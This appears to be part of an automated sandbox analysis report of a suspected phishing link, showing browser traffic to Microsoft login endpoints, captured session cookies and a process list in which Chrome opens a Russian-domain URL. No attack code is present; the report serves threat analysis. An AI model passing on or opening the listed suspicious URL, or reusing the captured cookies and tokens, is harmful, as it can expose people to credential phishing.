                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:52 UTC3110OUTPOST /common/GetCredentialType?mkt=en-US HTTP/1.1
                                                                        Host: login.microsoftonline.com
                                                                        Connection: keep-alive
                                                                        Content-Length: 1971
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        hpgrequestid: 22619617-7e2e-435a-ae36-53d523270b00
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        client-request-id: bfef4c53-ba37-4e79-a3f1-3523065f2cbd
                                                                        canary: PAQABDgEAAABVrSpeuWamRam2jAF1XRQEJ_vXJYomkzeDd3q8ojUEKaP-bXmP53U62B8xsXn4DyVMSnBvUGMH7vDWQUT1sjz9DSzS-MPIsWM08o053md-iji8XFSSAlyLtuSiPvE2aYo-77qY8tPrWZLUuV9rg0d3RoYtmH4fDc91tVwFxyg9I_a34aP2R43qgmDyoW1R0D0DXWPcGbDr5tLEmhICE-5b0vwdCCEoW9pg03OkhBlyvyAA
                                                                        Content-type: application/json; charset=UTF-8
                                                                        hpgid: 1104
                                                                        Accept: application/json
                                                                        hpgact: 1800
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Origin: https://login.microsoftonline.com
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Referer: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Cookie: x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; esctx-U6EDcUQ9DgQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEkS-Q0uQ4TjjVzMVNFwWbKIJL9BPWyss2XE1eiaga3SrvlhTF1Mvmx5jfgJiKC80jVaxyNtbYOWMWteacDNbTh1lsWzCjMabjresuFK7iDYKApGpQ4S-vaUW58U-s3RxJTt5RP01gql4Tfa0_KujZcSAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQsAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAALAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEJDMrX0k616j2yDvbuUA1HY3zsMsNLE89Mnk8TQD2ucaBj2uyTgq0kZWxq_B81JVAK9hIlD1zaPLdrE6h0u-xBliseFecQTU7oMpt3rck68IgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEGHYAiUQEnH7sguqyW8P4fXdVFnlmqARlDDyZoE59darIpPE1mXszsunDkhJWDaYoULRegB8gDCyttKPnib7i7DzquwwyNTRrmhbjxaUvw_NBr-gt-sHT8LBSOPjXdZ4r_BvXVOWm_tOkkDAFvoUeezRrwacbjDunBBDvVxJlHccgAA; esctx-qRVTTDWdaSg=AQABCQEAAABVrSpeuWamRam2jAF1XRQEc3xvgGwDLDvfMguJbW3YSGmUUoC5-ppJnVE6DAAfKhhz_EHPN0lufitC0TtszwEA7cS_p4zybbdneMPs7wUVFhuaEQ0QxY4LObRmiN0hHgUauuwICfXXynAAoOcVAkR6iEnL-LscAOs4k6Jubt11lSAA; fpc=Ah2mxvmYW6hHh5mjBN3488K8Ae7AAQAAAFe4Gt8OAAAA; MicrosoftApplicationsTelemetryDeviceId=e965 [TRUNCATED]
                                                                        2025-01-16 08:20:52 UTC1971OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 31 70 32 73 77 40 75 77 74 79 6d 2e 63 6f 22 2c 22 69 73 4f 74 68 65 72 49 64 70 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 63 68 65 63 6b 50 68 6f 6e 65 73 22 3a 66 61 6c 73 65 2c 22 69 73 52 65 6d 6f 74 65 4e 47 43 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 69 73 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 53 68 6f 77 6e 22 3a 66 61 6c 73 65 2c 22 69 73 46 69 64 6f 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 6f 72 69 67 69 6e 61 6c 52 65 71 75 65 73 74 22 3a 22 72 51 51 49 41 52 41 41 68 5a 49 39 6a 4e 70 32 41 4d 56 74 75 4f 50 75 36 45 64 51 57 72 58 70 64 6b 6f 71 74 65 6f 46 38 4c 66 78 53 52 6b 4d 35 67 43 66 50 77 49 32 47 48 74 42 42 76 37 47 42 6e 39 67 62 47 7a 6a 6f 58 4f 6e 4b 46 4f 47
                                                                        Data Ascii: {"username":"c1p2sw@uwtym.co","isOtherIdpSupported":true,"checkPhones":false,"isRemoteNGCSupported":true,"isCookieBannerShown":false,"isFidoSupported":true,"originalRequest":"rQQIARAAhZI9jNp2AMVtuOPu6EdQWrXpdkoqteoF8LfxSRkM5gCfPwI2GHtBBv7GBn9gbGzjoXOnKFOG
                                                                        2025-01-16 08:20:53 UTC1623INHTTP/1.1 200 OK
                                                                        Cache-Control: no-store, no-cache
                                                                        Pragma: no-cache
                                                                        Content-Type: application/json; charset=utf-8
                                                                        Expires: -1
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                        X-Content-Type-Options: nosniff
                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                        client-request-id: bfef4c53-ba37-4e79-a3f1-3523065f2cbd
                                                                        x-ms-request-id: 50999151-40e5-4fd0-8303-0c8ccdcf0500
                                                                        x-ms-ests-server: 2.1.19870.3 - WEULR1 ProdSlices
                                                                        report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}
                                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                        x-ms-srs: 1.P
                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-ssECWFXjjxNNKE9uLZDIOg' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                                        X-XSS-Protection: 0
                                                                        Set-Cookie: fpc=Ah2mxvmYW6hHh5mjBN3488K8Ae7AAQAAAFe4Gt8OAAAA; expires=Sat, 15-Feb-2025 08:20:53 GMT; path=/; secure; HttpOnly; SameSite=None
                                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                                        Date: Thu, 16 Jan 2025 08:20:52 GMT
                                                                        Connection: close
                                                                        Content-Length: 1265
                                                                        2025-01-16 08:20:53 UTC1265INData Raw: 7b 22 55 73 65 72 6e 61 6d 65 22 3a 22 63 31 70 32 73 77 40 75 77 74 79 6d 2e 63 6f 22 2c 22 44 69 73 70 6c 61 79 22 3a 22 63 31 70 32 73 77 40 75 77 74 79 6d 2e 63 6f 22 2c 22 49 66 45 78 69 73 74 73 52 65 73 75 6c 74 22 3a 31 2c 22 49 73 55 6e 6d 61 6e 61 67 65 64 22 3a 66 61 6c 73 65 2c 22 54 68 72 6f 74 74 6c 65 53 74 61 74 75 73 22 3a 31 2c 22 43 72 65 64 65 6e 74 69 61 6c 73 22 3a 7b 22 50 72 65 66 43 72 65 64 65 6e 74 69 61 6c 22 3a 31 2c 22 48 61 73 50 61 73 73 77 6f 72 64 22 3a 74 72 75 65 2c 22 52 65 6d 6f 74 65 4e 67 63 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 46 69 64 6f 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 51 72 43 6f 64 65 50 69 6e 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 53 61 73 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 43 65 72 74
                                                                        Data Ascii: {"Username":"c1p2sw@uwtym.co","Display":"c1p2sw@uwtym.co","IfExistsResult":1,"IsUnmanaged":false,"ThrottleStatus":1,"Credentials":{"PrefCredential":1,"HasPassword":true,"RemoteNgcParams":null,"FidoParams":null,"QrCodePinParams":null,"SasParams":null,"Cert


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.5500612.18.64.2154433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:21:21 UTC436OUTOPTIONS /api/report?catId=GW+estsfd+ams2 HTTP/1.1
                                                                        Host: identity.nel.measure.office.net
                                                                        Connection: keep-alive
                                                                        Origin: https://login.microsoftonline.com
                                                                        Access-Control-Request-Method: POST
                                                                        Access-Control-Request-Headers: content-type
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:21:21 UTC319INHTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Content-Length: 7
                                                                        Date: Thu, 16 Jan 2025 08:21:21 GMT
                                                                        Connection: close
                                                                        Access-Control-Allow-Headers: content-type
                                                                        Access-Control-Allow-Credentials: false
                                                                        Access-Control-Allow-Methods: *
                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                        Access-Control-Allow-Origin: *
                                                                        2025-01-16 08:21:21 UTC7INData Raw: 4f 50 54 49 4f 4e 53
                                                                        Data Ascii: OPTIONS


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.5500622.18.64.2154433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:21:22 UTC369OUTPOST /api/report?catId=GW+estsfd+ams2 HTTP/1.1
                                                                        Host: identity.nel.measure.office.net
                                                                        Connection: keep-alive
                                                                        Content-Length: 1237
                                                                        Content-Type: application/reports+json
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:21:22 UTC1237OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 30 36 36 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 32 35 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 2f 63 6f 6d 6d 6f 6e 2f 6f 61 75 74 68 32 2f 76 32 2e 30 2f 61 75 74 68 6f 72 69 7a 65 3f 63 6c 69 65 6e 74 5f 69 64 3d 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 26 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 6f
                                                                        Data Ascii: [{"age":40663,"body":{"elapsed_time":1258,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.o
                                                                        2025-01-16 08:21:23 UTC333INHTTP/1.1 429 Too Many Requests
                                                                        Content-Length: 0
                                                                        Request-Context: appId=cid-v1:41ca65cb-08a6-4a29-94ab-18b081ee8b8b
                                                                        Date: Thu, 16 Jan 2025 08:21:23 GMT
                                                                        Connection: close
                                                                        Access-Control-Allow-Credentials: false
                                                                        Access-Control-Allow-Methods: *
                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                        Access-Control-Allow-Origin: *


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:03:20:04
                                                                        Start date:16/01/2025
                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                        Imagebase:0x7ff715980000
                                                                        File size:3'242'272 bytes
                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:2
                                                                        Start time:03:20:08
                                                                        Start date:16/01/2025
                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1972,i,3349844353704011253,6770722091847730992,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                        Imagebase:0x7ff715980000
                                                                        File size:3'242'272 bytes
                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:3
                                                                        Start time:03:20:14
                                                                        Start date:16/01/2025
                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://56.hanagibenewe.ru/Y7MD/"
                                                                        Imagebase:0x7ff715980000
                                                                        File size:3'242'272 bytes
                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        No disassembly